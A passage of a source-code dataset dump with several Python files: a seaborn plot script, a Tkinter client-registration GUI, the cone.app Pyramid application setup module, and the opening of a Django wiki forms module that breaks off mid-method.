ha=\"right\", va=\"center\")\nfor label in ax3.get_xticklabels():\n label.set_ha(\"right\")\n label.set_rotation(45)\n\ng.fig.subplots_adjust(top=0.8)\ng.fig.suptitle('Summary of results for trained, validated, and tested on footage of CCTVs that have category 3 rainfall')\nlines = Line2D([0], [0], color='r', linewidth=1, linestyle='-.')\nlengend_data = g._legend_data\nlabels= [\"2 - train on 4 CCTV's\"]\nlabels.extend(list(lengend_data.keys()))\nshapes = []\nshapes.append(lines)\nshapes.extend(list(lengend_data.values()))\n\nplt.legend(shapes,labels)\nplt.show()\n","repo_name":"yxinjiang/My_Utils","sub_path":"seaborn_catplot.py","file_name":"seaborn_catplot.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74983786750","text":"from tkinter import*\nfrom tkinter import messagebox\nfrom tkinter import Tk, StringVar, ttk\nfrom PIL import Image, ImageTk\nfrom tkcalendar import Calendar, DateEntry\nfrom datetime import date\nfrom view import *\n\n\n\n\n\njanela = Tk()\njanela.title('')\njanela.geometry('1200x600')\njanela.configure(background=\"gray\")\njanela.resizable(width=FALSE, height=FALSE)\n\nstyle = 
ttk.Style(janela)\nstyle.theme_use('clam')\n\n#criando frames\n\nframeCima = Frame(janela, width=1200, height=50, bg=\"#feffff\", relief=FLAT)\nframeCima.grid(row=0, column=0)\n\nframeMeio = Frame(janela, width= 1043, height=303, bg=\"#feffff\", pady=20, relief=FLAT)\nframeMeio.grid(row=1, column=0, pady=1, padx=0, sticky=NSEW)\n\nframeBaixo = Frame(janela, width= 1043, height=300, bg=\"#feffff\", pady=20, relief=FLAT)\nframeBaixo.grid(row=2, column=0, pady=1, padx=0, sticky=NSEW)\n#conectando funçoes\n \nglobal tree\n\ndef inserir():\n \n\n nome=e_nome.get()\n idade=e_idade.get()\n turno=e_turno.get()\n endereco=e_endereco.get()\n dataE=e_cale.get()\n dataS=e_cals.get()\n dataPag=e_calpag.get()\n cont=e_contato.get()\n obs=e_pesquisar.get()\n\n lista_cadastrar = [nome, idade, turno, endereco, dataE, dataS, dataPag, cont, obs]\n\n for i in lista_cadastrar:\n if i =='':\n messagebox.showerror('Erro', 'Preencha todos os campos')\n return\n \n inserir_cadastro(lista_cadastrar)\n messagebox.showinfo('Sucesso', 'sucesso')\n \n e_nome.delete(0,'end')\n e_idade.delete(0,'end')\n e_turno.delete(0,'end')\n e_endereco.delete(0,'end')\n e_cale.delete(0,'end')\n e_cals.delete(0,'end')\n e_calpag.delete(0,'end')\n e_contato.delete(0,'end')\n e_pesquisar.delete(0,'end') \n\n mostrar()\n\n\ndef atualizar():\n try:\n treev_clientes = tree.focus()\n treev_dicionario = tree.item(treev_clientes)\n treev_lista = treev_dicionario['values']\n\n valor =treev_lista[0]\n\n e_nome.delete(0,'end')\n e_idade.delete(0,'end')\n e_turno.delete(0,'end')\n e_endereco.delete(0,'end')\n e_cale.delete(0,'end')\n e_cals.delete(0,'end')\n e_calpag.delete(0,'end')\n e_contato.delete(0,'end')\n e_pesquisar.delete(0,'end')\n\n id=int(treev_lista[0])\n e_nome.insert(0,treev_lista[1])\n e_idade.insert(0,treev_lista[2])\n e_turno.insert(0,treev_lista[3])\n e_endereco.insert(0,treev_lista[4])\n e_cale.insert(0,treev_lista[5])\n e_cals.insert(0,treev_lista[6])\n e_calpag.insert(0,treev_lista[7])\n e_contato.insert(0,treev_lista[8])\n e_pesquisar.insert(0,treev_lista[9])\n\n def update():\n nome=e_nome.get()\n idade=e_idade.get()\n turno=e_turno.get()\n endereco=e_endereco.get()\n dataE=e_cale.get()\n dataS=e_cals.get()\n dataPag=e_calpag.get()\n cont=e_contato.get()\n obs=e_pesquisar.get()\n \n lista_atualizar = [nome, idade, turno, endereco, dataE, dataS, dataPag, cont, obs, id]\n \n for i in lista_atualizar:\n if i=='':\n messagebox.showerror('Erro', 'Preencha todos os campos')\n return\n \n atualizar_dados(lista_atualizar)\n messagebox.showinfo('Sucesso', 'Sucesso')\n\n e_nome.delete(0,'end')\n e_idade.delete(0,'end')\n e_turno.delete(0,'end')\n e_endereco.delete(0,'end')\n e_cale.delete(0,'end')\n e_cals.delete(0,'end')\n e_calpag.delete(0,'end')\n e_contato.delete(0,'end')\n e_pesquisar.delete(0,'end')\n\n b_comfirm.destroy()\n\n mostrar()\n \n b_comfirm = Button(frameMeio,command=update, width=13, text='Confirmar'.upper(), overrelief=RIDGE, font=('Ivy 8 bold'), bg=\"#feffff\", fg=\"#2e2d2b\")\n b_comfirm.place(x=330, y=185)\n\n\n\n\n\n except IndexError:\n messagebox.showerror('Erro', 'Seleciona um dos dados na tebela')\n#função delete\ndef deletar():\n try:\n treev_clientes = tree.focus()\n treev_dicionario = tree.item(treev_clientes)\n treev_lista = treev_dicionario['values']\n\n valor =treev_lista[0]\n\n deletar_dados([valor])\n\n messagebox.showinfo('Sucesso', 'Sucesso')\n\n mostrar()\n\n except IndexError:\n messagebox.showerror('Erro', 'Seleciona um dos dados na tebela')\n\n\n# função ver item\ndef ver_cliente1(): \n 
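# read the values of the row currently selected in the Treeview\n 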
treev_clientes = tree.focus()\n treev_dicionario = tree.item(treev_clientes)\n treev_lista = treev_dicionario['values']\n\n valor = [int(treev_lista[0])] \n\n cliente = ver_cliente(valor)\n\n \n vdados = cliente[0][1]\n l_vdados = Label(frameMeio, text='Nome: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=10)\n \n vdados = cliente[0][2]\n l_vdados = Label(frameMeio, text='idade: '+str(vdados), height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=850, y=10)\n\n vdados = cliente[0][3]\n l_vdados = Label(frameMeio, text='Turno: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=40)\n \n vdados = cliente[0][4]\n l_vdados = Label(frameMeio, text='Endereço: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=850, y=40)\n \n vdados = cliente[0][5]\n l_vdados = Label(frameMeio, text='Entrada: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=70)\n\n vdados = cliente[0][6]\n l_vdados = Label(frameMeio, text='Saida: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=850, y=70)\n \n vdados = cliente[0][7]\n l_vdados = Label(frameMeio, text='Ultimo Pagamento: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=100)\n \n vdados = cliente[0][8]\n l_vdados = Label(frameMeio, text='Contato: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=130)\n\n vdados = cliente[0][8]\n l_vdados = Label(frameMeio, text='Observações: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=160)\n \n\n \n\n#logo\napp_img = Image.open('iconprincipal.png.png')\napp_img = app_img.resize((45,45))\napp_img = ImageTk.PhotoImage(app_img)\n\napp_logo = Label(frameCima, image=app_img, text='Clientes Arvore da vida', width=900, compound=LEFT, relief=RAISED, anchor=NW, font=('Verdana 20 bold'), bg= \"#feffff\", fg=\"#403d3d\")\napp_logo.place(x=0, y=0)\n\n#frame meio\nl_nome = Label(frameMeio, text='Nome', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_nome.place(x=10, y=10)\ne_nome = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_nome.place(x=130, y=11)\n\nl_idade = Label(frameMeio, text='Idade', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_idade.place(x=10, y=40)\ne_idade = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_idade.place(x=130, y=41)\n\nl_turno = Label(frameMeio, text='Turno', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_turno.place(x=10, y=70)\ne_turno = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_turno.place(x=130, y=71)\n\n\nl_endereco = Label(frameMeio, text='Endereço', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_endereco.place(x=10, y=100)\ne_endereco = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_endereco.place(x=130, y=101)\n\nl_cale = Label(frameMeio, text='Data de entrada', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_cale.place(x=10, y=130)\ne_cale = DateEntry(frameMeio, width=12,Background='darkblue', bordewidth= 2, year=2023)\ne_cale.place(x=130, y=131)\n\nl_cals = Label(frameMeio, text='Data de 
saida', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_cals.place(x=10, y=160)\ne_cals = DateEntry(frameMeio, width=12,Background='darkblue', bordewidth= 2, year=2023)\ne_cals.place(x=130, y=161)\n\nl_calpag = Label(frameMeio, text='Ultimo pagamento', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_calpag.place(x=10, y=190)\ne_calpag = DateEntry(frameMeio, width=12,Background='darkblue', bordewidth= 2, year=2023)\ne_calpag.place(x=130, y=191)\n\nl_contato = Label(frameMeio, text='Contato', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_contato.place(x=10, y=220)\ne_contato = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_contato.place(x=130, y=221)\n\nl_pesquisar = Label(frameMeio, text='Observação', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_pesquisar.place(x=10, y=250)\ne_pesquisar = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_pesquisar.place(x=130, y=251)\n\n#cirando buttom\napp_add = Image.open('cadastrar.png')\napp_add = app_add.resize((20,20))\napp_add = ImageTk.PhotoImage(app_add)\n\nb_cadastrar = Button(frameMeio, command=inserir, image=app_add, width=95, text=' Cadastrar'.upper(), compound=LEFT, anchor=NW, overrelief=RIDGE, font=('Ivy 8'), bg=\"#feffff\", fg=\"#2e2d2b\")\nb_cadastrar.place(x=330, y=10)\n\napp_atualizar = Image.open('update.png')\napp_atualizar = app_atualizar.resize((20,20))\napp_atualizar = ImageTk.PhotoImage(app_atualizar)\n\nb_atulizar = Button(frameMeio,command=atualizar, image=app_atualizar, width=95, text=' Atulizar'.upper(), compound=LEFT, anchor=NW, overrelief=RIDGE, font=('Ivy 8'), bg=\"#feffff\", fg=\"#2e2d2b\")\nb_atulizar.place(x=330, y=50)\n\napp_delete = Image.open('delete.png')\napp_delete = app_delete.resize((20,20))\napp_delete = ImageTk.PhotoImage(app_delete)\n\nb_delete = Button(frameMeio,command=deletar, image=app_delete, width=95, text=' delete'.upper(), compound=LEFT, anchor=NW, overrelief=RIDGE, font=('Ivy 8'), bg=\"#feffff\", fg=\"#2e2d2b\")\nb_delete.place(x=330, y=90)\n\napp_cliente = Image.open('cliente.png')\napp_cliente = app_cliente.resize((20,20))\napp_cliente = ImageTk.PhotoImage(app_cliente)\n\nb_cliente = Button(frameMeio, command=ver_cliente1, image=app_cliente, width=95, text=' cliente'.upper(), compound=LEFT, anchor=NW, overrelief=RIDGE, font=('Ivy 8'), bg=\"#feffff\", fg=\"#2e2d2b\")\nb_cliente.place(x=330, y=251)\n\nl_quantidade = Label(frameMeio, text='',pady=5, width=14, height=2, anchor=CENTER, font=('Ivy 17 bold'), bg=\"#4fa882\", fg=\"#403d3d\")\nl_quantidade.place(x=450, y=17)\n\nl_quantidade_ = Label(frameMeio, text=' Quantidade Total de Clientes. 
', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#4fa882\", fg=\"#403d3d\")\nl_quantidade_.place(x=450, y=12)\n\ndef mostrar():\n global tree\n\n\n tabela_head = ['#Numero','Nome', 'Idade','Turno','Endereço', 'Data de entrada', 'Data de saida', 'Ultimo pagamento', 'Contato responsavel', 'Observações']\n\n lista_itens = ver_dados()\n\n\n\n tree = ttk.Treeview(frameBaixo, selectmode=\"extended\",columns=tabela_head, show=\"headings\")\n\n # vertical scrollbar\n vsb = ttk.Scrollbar(frameBaixo, orient=\"vertical\", command=tree.yview)\n\n # horizontal scrollbar\n hsb = ttk.Scrollbar(frameBaixo, orient=\"horizontal\", command=tree.xview)\n\n tree.configure(yscrollcommand=vsb.set, xscrollcommand=hsb.set)\n tree.grid(column=0, row=0, sticky='nsew')\n vsb.grid(column=1, row=0, sticky='ns')\n hsb.grid(column=0, row=1, sticky='ew')\n frameBaixo.grid_rowconfigure(0, weight=12)\n\n hd=[\"center\",\"center\",\"center\",\"center\",\"center\",\"center\",\"center\",\"center\",\"center\",\"center\"]\n h=[80,100,40,80,160,110,110,120,130,180]\n n=0\n\n for col in tabela_head:\n tree.heading(col, text=col.title(), anchor=CENTER)\n # adjust the column's width to the header string\n tree.column(col, width=h[n],anchor=hd[n])\n n+=1\n\n # inserindo os itens dentro da tabela\n for item in lista_itens:\n tree.insert('', 'end', values=item)\n \n\n quantidade = []\n\n for iten in lista_itens:\n quantidade.append(iten[1])\n\n\n Total_itens = len(quantidade)\n\n\n l_quantidade['text'] = Total_itens\n\nmostrar()\n\n\n\n\njanela.mainloop()\n\n\n","repo_name":"Jvbrs/cadastros-clientes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12249,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22886101998","text":"# -*- coding: utf-8 -*-\nfrom cone.app import browser\nfrom cone.app import security\nfrom cone.app.interfaces import IApplicationNode\nfrom cone.app.model import AppRoot\nfrom cone.app.model import AppSettings\nfrom cone.app.model import LayoutConfig\nfrom cone.app.model import Properties\nfrom cone.app.ugm import ugm_backend\nfrom cone.app.utils import format_traceback\nfrom cone.app.utils import node_path\nfrom node.interfaces import INode\nfrom pyramid.authentication import AuthTktAuthenticationPolicy\nfrom pyramid.authorization import ACLAuthorizationPolicy\nfrom pyramid.config import Configurator\nfrom pyramid.static import static_view\nfrom pyramid.traversal import ResourceTreeTraverser\nfrom yafowil.resources import YafowilResources as YafowilResourcesBase\nfrom zope.component import adapter\nfrom zope.component import getGlobalSiteManager\nimport importlib\nimport logging\nimport pyramid_chameleon\nimport pyramid_zcml\nimport sys\nimport threading\n\n\nlogger = logging.getLogger('cone.app')\n\n# configuration\ncfg = Properties()\n\n# available languages\ncfg.available_languages = []\n\n# used main template\ncfg.main_template = 'cone.app.browser:templates/main.pt'\n\n# default node icon\ncfg.default_node_icon = 'glyphicon glyphicon-asterisk'\n\n# XXX: move resource registration to browser package\n# XXX: support developmenet and production mode\n\n# JS resources\ncfg.js = Properties()\ncfg.js.public = [\n 'static/public.js'\n]\ncfg.js.protected = [\n 'static/protected.js'\n]\n\n# CSS Resources\ncfg.css = Properties()\n\n# development\ncfg.css.public = [\n 'static/jqueryui/jquery-ui-1.10.3.custom.css',\n 'static/bootstrap/css/bootstrap.css',\n 'static/bootstrap/css/bootstrap-theme.css',\n 
'static/ionicons/css/ionicons.css',\n 'static/typeahead/typeahead.css',\n '++resource++bdajax/bdajax_bs3.css',\n 'static/styles.css'\n]\n\n# production\n# cfg.css.public = [\n# 'static/jqueryui/jquery-ui-1.10.3.custom.css',\n# 'static/bootstrap/css/bootstrap.min.css',\n# 'static/bootstrap/css/bootstrap-theme.min.css',\n# 'static/ionicons/css/ionicons.css',\n# 'static/typeahead/typeahead.css',\n# '++resource++bdajax/bdajax_bs3.css',\n# 'static/styles.css'\n# ]\n\ncfg.css.protected = list()\n\n# JS and CSS Assets to publish merged\ncfg.merged = Properties()\ncfg.merged.js = Properties()\n\n# development\ncfg.merged.js.public = [\n (browser.static_resources, 'jquery-1.9.1.js'),\n (browser.static_resources, 'jquery.migrate-1.2.1.js'),\n (browser.static_resources, 'jqueryui/jquery-ui-1.10.3.custom.js'),\n (browser.static_resources, 'bootstrap/js/bootstrap.js'),\n (browser.static_resources, 'typeahead/typeahead.bundle.js'),\n (browser.static_resources, 'cookie_functions.js')\n]\n\n# production\n# cfg.merged.js.public = [\n# (browser.static_resources, 'jquery-1.9.1.min.js'),\n# (browser.static_resources, 'jquery.migrate-1.2.1.min.js'),\n# (browser.static_resources, 'jqueryui/jquery-ui-1.10.3.custom.min.js'),\n# (browser.static_resources, 'bootstrap/js/bootstrap.min.js'),\n# (browser.static_resources, 'typeahead/typeahead.bundle.js'),\n# (browser.static_resources, 'cookie_functions.js')\n# ]\n\ncfg.merged.js.protected = list()\n\ncfg.merged.css = Properties()\ncfg.merged.css.public = list()\ncfg.merged.css.protected = list()\n\ncfg.merged.print_css = Properties()\ncfg.merged.print_css.public = [\n (browser.static_resources, 'print.css')\n]\ncfg.merged.print_css.protected = list()\n\n\nclass layout_config(object):\n _registry = dict()\n\n def __init__(self, *for_):\n self.for_ = for_\n\n def __call__(self, factory):\n for context in self.for_:\n self._registry[context] = factory\n return factory\n\n @classmethod\n def lookup(cls, model=None, request=None):\n for cls_ in model.__class__.mro():\n factory = cls._registry.get(cls_)\n if factory:\n return factory(model=model, request=request)\n\n\n@layout_config(object)\nclass DefaultLayoutConfig(LayoutConfig):\n\n def __init__(self, model=None, request=None):\n super(DefaultLayoutConfig, self).__init__(model=model, request=request)\n self.mainmenu = True\n self.mainmenu_fluid = False\n self.livesearch = True\n self.personaltools = True\n self.columns_fluid = False\n self.pathbar = True\n self.sidebar_left = ['navtree']\n self.sidebar_left_grid_width = 3\n self.content_grid_width = 9\n\n\ndef import_from_string(path):\n mod, ob = path.rsplit('.', 1)\n return getattr(importlib.import_module(mod), ob)\n\n\nroot = None\n\n\ndef get_root(environ=None):\n return root\n\n\ndef configure_root(root, settings):\n root.metadata.title = settings.get('cone.root.title', 'CONE')\n root.properties.default_child = settings.get('cone.root.default_child')\n mainmenu_empty_title = settings.get('cone.root.mainmenu_empty_title')\n mainmenu_empty_title = mainmenu_empty_title in ['True', 'true', '1']\n root.properties.mainmenu_empty_title = mainmenu_empty_title\n default_content_tile = settings.get('cone.root.default_content_tile')\n if default_content_tile:\n root.properties.default_content_tile = default_content_tile\n root.properties.in_navtree = False\n\n\ndef default_root_node_factory(settings):\n root = AppRoot()\n root.factories['settings'] = AppSettings\n configure_root(root, settings)\n return root\n\n\ndef register_config(key, factory):\n root = get_root()\n 
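# config factories are registered as children of the root's 'settings' node\n 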
factories = root['settings'].factories\n if key in factories:\n raise ValueError(u\"Config with name '%s' already registered.\" % key)\n factories[key] = factory\n\n\n# B/C\nregister_plugin_config = register_config\n\n\ndef register_entry(key, factory):\n root = get_root()\n factories = root.factories\n if key in factories:\n raise ValueError(u\"Entry with name '%s' already registered.\" % key)\n root.factories[key] = factory\n\n\n# B/C\nregister_plugin = register_entry\n\n\nmain_hooks = list()\n\n\ndef main_hook(func):\n \"\"\"decorator to register main hook.\n\n Decorated function gets called on application startup.\n \"\"\"\n main_hooks.append(func)\n return func\n\n\n# B/C\ndef register_main_hook(callback):\n \"\"\"Register function to get called on application startup.\n \"\"\"\n main_hooks.append(callback)\n\n\nthread_shutdown_hooks = list()\n\n\ndef thread_shutdown_hook(func): # pragma: no cover\n \"\"\"decorator to register thread shutdown hook.\n\n Decorated function gets called when main thread joins. Thread shutdown\n hooks are used for graceful joining of non daemon threads.\n \"\"\"\n thread_shutdown_hooks.append(func)\n return func\n\n\ndef auth_tkt_factory(**kwargs):\n kwargs.setdefault('callback', security.groups_callback)\n return AuthTktAuthenticationPolicy(**kwargs)\n\n\ndef acl_factory(**kwargs):\n return ACLAuthorizationPolicy()\n\n\ncfg.yafowil = Properties()\ncfg.yafowil.js_skip = set()\ncfg.yafowil.css_skip = set()\n\n# ignore bootstrap dependencies delivered by yafowil.bootstrap\ncfg.yafowil.js_skip.add('bootstrap.dependencies')\ncfg.yafowil.css_skip.add('bootstrap.dependencies')\n\n\nclass YafowilResources(YafowilResourcesBase):\n\n def __init__(self, js_skip=[], css_skip=[], config=None):\n self.config = config\n super(YafowilResources, self).__init__(\n js_skip=js_skip,\n css_skip=css_skip\n )\n\n def configure_resource_directory(self, plugin_name, resourc_edir):\n app = sys.modules[__name__]\n resources_view = static_view(resourc_edir, use_subpath=True)\n view_name = '%s_resources' % plugin_name.replace('.', '_')\n setattr(app, view_name, resources_view)\n view_path = 'cone.app.%s' % view_name\n resource_base = '++resource++%s' % plugin_name\n self.config.add_view(view_path, name=resource_base)\n return resource_base\n\n\ndef configure_yafowil_addon_resources(config, public):\n resources = YafowilResources(\n js_skip=cfg.yafowil.js_skip,\n css_skip=cfg.yafowil.css_skip,\n config=config\n )\n js_resources = cfg.js.public if public else cfg.js.protected\n css_resources = cfg.css.public if public else cfg.css.protected\n for js in reversed(resources.js_resources):\n js_resources.insert(0, js)\n for css in resources.css_resources:\n css_resources.insert(0, css)\n\n\ndef configure_bdajax_resources():\n # bdajax needs to be loaded before resources depending on it order to\n # avoid double binding on document ready\n cfg.js.public.insert(0, '++resource++bdajax/bdajax_bs3.js')\n cfg.js.public.insert(0, '++resource++bdajax/bdajax.js')\n cfg.js.public.insert(0, '++resource++bdajax/overlay.js')\n\n\n@adapter(IApplicationNode)\nclass ApplicationNodeTraverser(ResourceTreeTraverser):\n\n def __call__(self, request):\n result = super(ApplicationNodeTraverser, self).__call__(request)\n context = result['context']\n if not IApplicationNode.providedBy(context):\n if INode.providedBy(context):\n result['context'] = context.acquire(IApplicationNode)\n result['view_name'] = context.name\n result['traversed'] = tuple(node_path(result['context']))\n else:\n result['context'] = 
get_root()\n result['view_name'] = ''\n result['traversed'] = tuple()\n return result\n\n\ndef start_thread_monitor(): # pragma: no cover\n if not thread_shutdown_hooks:\n return\n\n def _monitor():\n main_thread = threading.main_thread()\n main_thread.join()\n for hook in thread_shutdown_hooks:\n hook()\n\n monitor = threading.Thread(target=_monitor)\n monitor.daemon = True\n monitor.start()\n\n\ndef main(global_config, **settings):\n \"\"\"Returns WSGI application.\n \"\"\"\n # set authentication related application properties\n security.ADMIN_USER = settings.get('cone.admin_user')\n security.ADMIN_PASSWORD = settings.get('cone.admin_password')\n security.AUTHENTICATOR = settings.get('cone.authenticator')\n\n auth_secret = settings.pop('cone.auth_secret', 'secret')\n auth_cookie_name = settings.pop('cone.auth_cookie_name', 'auth_tkt')\n auth_secure = settings.pop('cone.auth_secure', False)\n auth_include_ip = settings.pop('cone.auth_include_ip', False)\n auth_timeout = settings.pop('cone.auth_timeout', None)\n auth_reissue_time = settings.pop('cone.auth_reissue_time', None)\n if auth_reissue_time is not None:\n auth_reissue_time = int(auth_reissue_time)\n auth_max_age = settings.pop('cone.auth_max_age', None)\n if auth_max_age is not None:\n auth_max_age = int(auth_max_age)\n auth_http_only = settings.pop('cone.auth_http_only', False)\n auth_path = settings.pop('cone.auth_path', \"/\")\n auth_wild_domain = settings.pop('cone.auth_wild_domain', True)\n\n auth_policy = auth_tkt_factory(\n secret=auth_secret,\n cookie_name=auth_cookie_name,\n secure=auth_secure,\n include_ip=auth_include_ip,\n timeout=auth_timeout,\n reissue_time=auth_reissue_time,\n max_age=auth_max_age,\n http_only=auth_http_only,\n path=auth_path,\n wild_domain=auth_wild_domain,\n )\n\n # create root node\n global root\n root_node_factory = settings.pop('cone.root.node_factory', None)\n if root_node_factory:\n root = import_from_string(root_node_factory)(settings)\n else:\n root = default_root_node_factory(settings)\n\n if settings.get('testing.hook_global_registry'):\n globalreg = getGlobalSiteManager()\n config = Configurator(registry=globalreg)\n config.setup_registry(root_factory=get_root, settings=settings)\n else:\n config = Configurator(root_factory=get_root, settings=settings)\n\n # set authentication and authorization policies\n config.set_authentication_policy(auth_policy)\n config.set_authorization_policy(acl_factory())\n config.commit()\n\n # begin configuration\n config.begin()\n\n # include general dependencies\n config.include(pyramid_chameleon)\n config.include(pyramid_zcml)\n\n # add custom traverser\n config.registry.registerAdapter(ApplicationNodeTraverser)\n\n # available languages\n available_languages = settings.get('cone.available_languages', '')\n cfg.available_languages = [\n lang.strip() for lang in available_languages.split(',') if lang\n ]\n\n # main template\n main_template = settings.get('cone.main_template')\n if main_template:\n cfg.main_template = main_template\n\n # add translation\n config.add_translation_dirs('cone.app:locale/')\n\n # XXX: register yafowil and all yafowil addon widget locales.\n # provide locales either in yafowil resources or as entry points in\n # all yafowil packages providing translations\n\n # static routes\n config.add_route(\"favicon\", \"/favicon.ico\")\n # XXX: robots.txt\n # XXX: humans.txt\n\n # register static resources\n config.add_view(browser.static_resources, name='static')\n\n # scan browser package\n config.scan(browser)\n\n # load zcml\n 
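# main() above repeatedly pops .ini-style settings, casting integers only when
# a value is present and treating '1'/'True'/'true' as truthy. A minimal sketch
# of that idiom (the keys and values below are illustrative, not cone.app API):
settings = {'cone.auth_timeout': '3600', 'yafowil.resources_public': 'true'}

auth_timeout = settings.pop('cone.auth_timeout', None)
if auth_timeout is not None:
    auth_timeout = int(auth_timeout)  # .ini values always arrive as strings

resources_public = settings.get('yafowil.resources_public')
resources_public = resources_public in ['1', 'True', 'true']

print(auth_timeout, resources_public)  # 3600 True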
config.load_zcml('configure.zcml')\n\n # read plugin configurator\n plugins = settings.get('cone.plugins', '')\n plugins = plugins.split('\\n')\n plugins = [pl for pl in plugins if pl and not pl.startswith('#')]\n for plugin in plugins:\n try:\n importlib.import_module(plugin)\n except ImportError:\n msg = 'Cannot import plugin {}\\n{}'.format(\n plugin,\n format_traceback()\n )\n logger.error(msg)\n continue\n try:\n config.load_zcml('{}:configure.zcml'.format(plugin))\n except IOError: # pragma: no cover\n msg = 'No configure.zcml in {}'.format(plugin)\n logger.info(msg)\n\n # execute main hooks\n filtered_hooks = list()\n for plugin in plugins:\n for hook in main_hooks:\n if hook.__module__.startswith(plugin):\n filtered_hooks.append(hook)\n for hook in filtered_hooks:\n hook(config, global_config, settings)\n\n # load and initialize UGM\n backend_name = settings.get('ugm.backend')\n # B/C\n if not backend_name:\n backend_name = settings.get('cone.auth_impl')\n if backend_name:\n try:\n ugm_backend.load(backend_name, settings)\n ugm_backend.initialize()\n except Exception: # pragma: no cover\n msg = 'Failed to create UGM backend:\\n{}'.format(format_traceback())\n logger.error(msg)\n\n user_display_attr = settings.get('ugm.user_display_attr')\n if user_display_attr:\n ugm_backend.user_display_attr = user_display_attr\n\n group_display_attr = settings.get('ugm.group_display_attr')\n if group_display_attr:\n ugm_backend.group_display_attr = group_display_attr\n\n # register yafowil static resources\n # done after addon config - addon code may disable yafowil resource groups\n # XXX: ``yafowil.resources_public`` is a temporary hack and stays\n # undocumented. In 1.1. ``webresource`` will be used for resource\n # registration and resource delivery configuration.\n yafowil_resources_public = settings.get('yafowil.resources_public')\n yafowil_resources_public = yafowil_resources_public in ['1', 'True', 'true']\n configure_yafowil_addon_resources(config, yafowil_resources_public)\n\n # ensure bdajax resources gets loaded before resources depending on it\n configure_bdajax_resources()\n\n # end configuration\n config.end()\n\n # start thread monitor if thread shutdown hooks registered\n start_thread_monitor()\n\n # return wsgi app\n return config.make_wsgi_app()\n\n\ndef make_remote_addr_middleware(app, global_conf):\n return RemoteAddrFilter(app)\n\n\nclass RemoteAddrFilter(object):\n \"\"\"Use this middleware if nginx is used as proxy and IP address should be\n included in auth cookie. make sure nginx passes the right header:\n\n proxy_set_header X-Real-IP $remote_addr;\n \"\"\"\n\n def __init__(self, app):\n self.app = app\n\n def __call__(self, environ, start_response):\n if 'HTTP_X_REAL_IP' in environ:\n environ['REMOTE_ADDR'] = environ['HTTP_X_REAL_IP']\n return self.app(environ, start_response)\n","repo_name":"conestack/cone.app","sub_path":"src/cone/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16176,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"8438238341","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.urls import reverse\nfrom django.core.exceptions import ValidationError\nfrom django import forms\nimport random\n\nimport markdown2\nfrom . 
import util\n\nclass EntryForm(forms.Form):\n title = forms.CharField(label=\"Title\")\n content = forms.CharField(label='', widget = forms.Textarea(attrs={'rows':20, 'cols':60}))\n\n def clean(self): # Validates the entire form.\n cleaned_data = super().clean()\n title_data = cleaned_data.get('title')\n title_content = cleaned_data.get('content')\n\n entered_line = title_content.partition('\\n')[0]\n ideal_line = '# '+ title_data\n if entered_line.strip() != ideal_line.strip(): # Check that the content format matches the title.\n if title_data in util.list_entries():\n raise ValidationError({\n 'title': ['Error: The title \"' + title_data + '\" already exists.'],\n 'content': ['Error: The first line of this entry should be: # ' + title_data],\n })\n raise ValidationError({'content':['Error: The first line of this entry should be: # ' + title_data]})\n if title_data in util.list_entries():\n raise ValidationError('Error: The title \"' + title_data + '\" already exists.')\n\nclass EditForm(forms.Form):\n title = forms.CharField(widget=forms.HiddenInput())\n content = forms.CharField(label='', widget = forms.Textarea(attrs={'rows':20, 'cols':60}))\n\n \"\"\"def clean(self): # Validates the entire form.\n cleaned_data = super().clean()\n title_data = cleaned_data.get('title')\n title_content = cleaned_data.get('content')\n\n first_line = title_content.partition('\\n')[0]\n ideal_line = '# ' + title_data\n if 